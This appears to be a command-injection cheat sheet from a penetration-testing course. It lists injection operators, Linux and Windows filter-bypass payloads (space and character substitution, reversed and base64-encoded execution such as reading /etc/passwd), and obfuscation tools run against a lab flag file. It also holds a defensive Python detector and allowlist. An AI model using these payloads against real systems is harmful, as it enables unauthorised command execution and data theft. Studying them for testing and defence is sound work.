Command injections

Hacktricks

PayloadsAllTheThings

PortSwigger

Injection operators

Injection Operator 	Injection Character 	URL-Encoded Character 	Executed Command
Semicolon 	; 	%3b 	Both
New Line 	\n 	%0a 	Both
Background 	& 	%26 	Both (second output generally shown first)
Pipe 	| 	%7c 	Both (only second output is shown)
AND 	&& 	%26%26 	Both (only if first succeeds)
OR 	|| 	%7c%7c 	Second (only if first fails)
Sub-Shell 	`` 	%60%60 	Both (Linux-only)
Sub-Shell 	$() 	%24%28%29 	Both (Linux-only)
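
The operators in the table above are what a server-side check has to catch, and it has to catch them after URL decoding, since the third column is how they arrive in a request. The Python below is an added example, not part of this cheat sheet or of any tool it names: it turns the table into a detector that decodes the parameter first (including double encoding), pairs it with an allowlist for an assumed ping-style host argument, and runs the program with an argument list and no shell. HOST_RE, find_injection_operators and ping_host are names chosen here.

```python
import re
import subprocess
import urllib.parse

# Operator table from the cheat sheet, keyed by the raw shell metacharacter.
# "&&" and "||" are caught by their single-character prefixes.
INJECTION_OPERATORS = {
    ";": "semicolon",
    "\n": "newline",
    "&": "background / AND",
    "|": "pipe / OR",
    "`": "sub-shell (backticks)",
    "$(": "sub-shell $()",
}

# Assumed input shape: a hostname or IPv4 literal for a ping-style lookup.
# A leading '-' is rejected so the value can never be parsed as an option.
HOST_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9.-]{0,252}$")


def decode_param(value, max_rounds=3):
    """URL-decode repeatedly so double-encoded %2526 -> %26 -> & is seen."""
    for _ in range(max_rounds):
        decoded = urllib.parse.unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_injection_operators(value):
    """Return the names of cheat-sheet operators present after decoding."""
    decoded = decode_param(value)
    return [name for op, name in INJECTION_OPERATORS.items() if op in decoded]


def is_valid_host(value):
    """Allowlist check: accept only what a host argument legitimately needs."""
    return HOST_RE.fullmatch(value) is not None


def ping_host(value):
    """Validate, then run ping as an argument list with no shell, so none of the
    operators above is interpreted even if the allowlist were later loosened."""
    if not is_valid_host(value):
        found = find_injection_operators(value)
        raise ValueError("rejected host %r, operators seen: %s" % (value, found))
    return subprocess.run(["ping", "-c", "1", value],
                          capture_output=True, text=True, timeout=10)
```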

Linux

Code 	Description
printenv 	Can be used to view all environment variables
Spaces 	
%09 	Using tabs instead of spaces
${IFS} 	Will be replaced with a space and a tab. Cannot be used in sub-shells (i.e. $())
{ls,-la} 	Commas will be replaced with spaces
Other Characters 	
${PATH:0:1} 	Will be replaced with /
${LS_COLORS:10:1} 	Will be replaced with ;
$(tr '!-}' '"-~'<<<[) 	Shift character by one ([ -> \)

Blacklisted Command Bypass

Code 	Description
Character Insertion 	
' or " 	Total number of quotes must be even
$@ or \ 	Linux only
Case Manipulation 	
$(tr "[A-Z]" "[a-z]"<<<"WhOaMi") 	Execute command regardless of cases
$(a="WhOaMi";printf %s "${a,,}") 	Another variation of the technique
Reversed Commands 	
echo 'whoami' | rev 	Reverse a string
$(rev<<<'imaohw') 	Execute reversed command
Encoded Commands 	
echo -n 'cat /etc/passwd | grep 33' | base64 	Encode a string with base64
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==) 	Execute b64 encoded string

Windows

Filtered Character Bypass

Code 	Description
Get-ChildItem Env: 	Can be used to view all environment variables - (PowerShell)
Spaces 	
%09 	Using tabs instead of spaces
%PROGRAMFILES:~10,-5% 	Will be replaced with a space - (CMD)
$env:PROGRAMFILES[10] 	Will be replaced with a space - (PowerShell)
Other Characters 	
%HOMEPATH:~0,-17% 	Will be replaced with \ - (CMD)
$env:HOMEPATH[0] 	Will be replaced with \ - (PowerShell)

Blacklisted Command Bypass

Code 	Description
Character Insertion 	
' or " 	Total number of quotes must be even
^ 	Windows only (CMD)
Case Manipulation 	
WhoAmi 	Simply send the command in mixed case (Windows commands are case-insensitive)
Reversed Commands 	
"whoami"[-1..-20] -join '' 	Reverse a string
iex "$('imaohw'[-1..-20] -join '')" 	Execute reversed command
Encoded Commands 	
[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('whoami')) 	Encode a string with base64
iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))" 	Execute base64-encoded string

Evasion Tools

Linux

A handy tool we can utilize for obfuscating bash commands is Bashfuscator.

git clone https://github.com/Bashfuscator/Bashfuscator
cd Bashfuscator
python3 setup.py install --user

Windows

There is also a very similar tool that we can use for Windows called DOSfuscation. Unlike Bashfuscator, this is an interactive tool.

git clone https://github.com/danielbohannon/Invoke-DOSfuscation.git
cd Invoke-DOSfuscation
Import-Module .\Invoke-DOSfuscation.psd1
Invoke-DOSfuscation
Invoke-DOSfuscation> help

We can also run the tutorial command to see an example of how the tool works. Once we are set, we can start using the tool as follows:

Invoke-DOSfuscation> SET COMMAND type C:\Users\htb-student\Desktop\flag.txt
Invoke-DOSfuscation> encoding
Invoke-DOSfuscation\Encoding> 1

...SNIP...
Result:
typ%TEMP:~-3,-2% %CommonProgramFiles:~17,-11%:\Users\h%TMP:~-13,-12%b-stu%SystemRoot:~-4,-3%ent%TMP:~-19,-18%%ALLUSERSPROFILE:~-4,-3%esktop\flag.%TMP:~-13,-12%xt

Finally, we can try running the obfuscated command on CMD, and we see that it indeed works as expected:

C:\htb> typ%TEMP:~-3,-2% %CommonProgramFiles:~17,-11%:\Users\h%TMP:~-13,-12%b-stu%SystemRoot:~-4,-3%ent%TMP:~-19,-18%%ALLUSERSPROFILE:~-4,-3%esktop\flag.%TMP:~-13,-12%xt

test_flag
